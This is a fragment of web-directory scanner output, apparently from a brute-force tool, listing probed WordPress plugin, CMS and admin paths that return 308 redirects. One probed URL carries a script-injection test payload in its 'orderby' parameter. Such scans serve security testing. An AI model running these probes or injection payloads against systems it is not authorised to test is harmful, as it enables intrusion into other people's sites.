/wp-content/plugins/wpengine-snapshot/snapshots/ (Status: 308) [Size: 47] [--> /wp-content/plugins/wpengine-snapshot/snapshots]
/wpdmpro/list-packages/?orderby=title%22%3e%3cscript%3ealert(1)%3c/script%3e&order=asc (Status: 308) [Size: 87] [--> /wpdmpro/list-packages?orderby=title%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&order=asc]
/wpdmpro/category-short-code/?orderby=publish_date (Status: 308) [Size: 49] [--> /wpdmpro/category-short-code?orderby=publish_date]
/www//app/admin/controller/admincontroller (Status: 308) [Size: 41] [--> /www/app/admin/controller/admincontroller]
/www/cve/fiyocms-1669403ec38e3f100d17786e06bc33c94152fcf3/ (Status: 308) [Size: 57] [--> /www/cve/fiyocms-1669403ec38e3f100d17786e06bc33c94152fcf3]
